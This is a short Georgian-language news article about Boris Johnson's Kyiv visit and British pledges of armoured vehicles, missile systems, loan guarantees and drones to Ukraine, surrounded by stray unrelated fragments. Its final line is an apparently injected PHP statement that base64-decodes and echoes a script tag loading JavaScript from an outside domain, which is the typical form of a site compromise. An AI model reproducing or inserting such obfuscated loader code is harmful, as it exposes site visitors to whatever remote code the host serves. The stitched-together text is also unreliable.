celsiusi
ავერსი შნაიდერი
ბრიტანეთის პრემიერ-მინისტრმა ბორის ჯონსონმა, კიევში პრეზიდენტ ვოლოდიმირ ზელენსკისთან შეხვედრის შემდეგ განაცხადა, რომ ლონდონი უკრაინას 120 ჯავშანმანქანას და ახალ ხომალდსაწინააღმდეგო სარაკეტო სისტემებს მიაწვდის. ამის შესახებ ინფორმაციას უკრაინული მედია ავრცელებს.
 
მედიის ინფორმაციით, ბრიტანეთი უკრაინას სავალუტო ფონდის მეშვეობით დამატებით 500 მილიონი დოლარის სესხის გარანტიებს გადასცემს. ასევე მოსალოდნელია, რომ ბრიტანეთი უკრაინის სამხედრო დახმარებას კიდევ 100 მილიონი დოლარით გაზრდის და ეს მოიცავს ტანკსაწინააღმდეგო და ანტისაჰაერო რაკეტებს, ასევე "კამიკაძეს დრონებს".
 
ზელენსკისთან შეხვედრისას, ბორის ჯონსონმა აღნიშნა, რომ "უკრაინამ, ყოველგვარი მოლოდინის საწინააღმდეგოდ, უკან დაახევინა რუსულ ჯარებს კიევიდან და 21-ე საუკუნის უდიდეს სამხედრო წარმატებას მიაღწია".
 
1023
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");